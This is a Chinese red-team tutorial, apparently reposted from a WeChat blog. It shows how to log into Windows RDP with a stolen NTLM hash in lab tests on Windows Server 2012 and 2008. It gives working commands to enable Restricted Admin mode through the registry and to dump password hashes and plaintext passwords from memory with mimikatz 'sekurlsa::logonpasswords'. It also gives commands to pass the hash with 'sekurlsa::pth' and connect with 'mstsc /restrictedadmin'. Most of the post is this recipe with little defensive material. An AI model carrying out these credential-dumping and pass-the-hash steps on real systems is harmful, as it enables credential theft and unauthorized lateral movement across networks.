红队攻防之hash登录RDP

admin
admin
admin
102369
文章
87
评论
2023年11月29日21:55:30评论21 views字数 2130阅读7分6秒阅读模式

没什么好害怕,孩子放心去飞吧,在你的身后有个等你的家

新建DWORD键值DisableRestrictedAdmin,0代表开启,1代表关闭

REG ADD HKLMSystemCurrentControlSetControlLsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

红队攻防之hash登录RDP

查询DisableRestrictedAdmin的值,0x0表示已开启

REG query HKLMSystemCurrentControlSetControlLsa | findstr DisableRestrictedAdmin

红队攻防之hash登录RDP

Hash登录rdp

测试1

这里我使用win2012尝试用hash登录win2012

win2012客户端命令行执行

mstsc.exe /restrictedadmin

红队攻防之hash登录RDP

这里是无法登录的,因为Restricted Admin mode会用当前Windows凭证进行登录,也就是我win2012的凭证,这肯定是不行的

红队攻防之hash登录RDP

在win2012机器上进行操作

使用mimikatz在线读取SAM文件

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"  #在线读取散列值及明文密码

红队攻防之hash登录RDP

客户端管理员权限运行mimiketz进行pth,这里使用win2012的用户名和hash

mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:Administrator /domain:xxx /ntlm:x

红队攻防之hash登录RDP

执行后弹出一个cmd框,这时我们伪造了win2012的凭证

cmd框内运行桌面登录

mstsc.exe /restrictedadmin

这时我们就是利用的win2012的凭证进行远程登录,如下图成功实现远程登录

红队攻防之hash登录RDP

测试2

尝试对win-2008进行hash登录(WIN7同样的操作)

正常win-2008是没有受限管理员模式的,根据微软文档,给win-2008打上补丁KB2984972

红队攻防之hash登录RDP

查看注册表,发现并没有DisableRestrictedAdmin这个键值对

REG query HKLMSystemCurrentControlSetControlLsa

红队攻防之hash登录RDP

使用mimikatz在线读取SAM文件

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"  #在线读取散列值及明文密码
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

红队攻防之hash登录RDP

客户端管理员权限运行mimiketz进行pth,这里使用win-2012-r2的用户名和hash

mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:Administrator /domain:x /ntlm:x

登录发现不行

红队攻防之hash登录RDP

在win-2008修改注册表,开启受限管理员模式

REG ADD HKLMSystemCurrentControlSetControlLsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

红队攻防之hash登录RDP

就可以成功登录了,说明win2008那些打的补丁,受限管理员模式是默认关闭状态。

注意,受限管理员模式只对管理员组成员有效,如果获取的用户只是可以远程桌面但不是管理员,那么就无法利用hash登录的。

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:各家兴 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。


CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85



原文始发于微信公众号(各家兴):红队攻防之hash登录RDP

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月29日21:55:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队攻防之hash登录RDPhttps://cn-sec.com/archives/2250710.html

发表评论

匿名网友 填写信息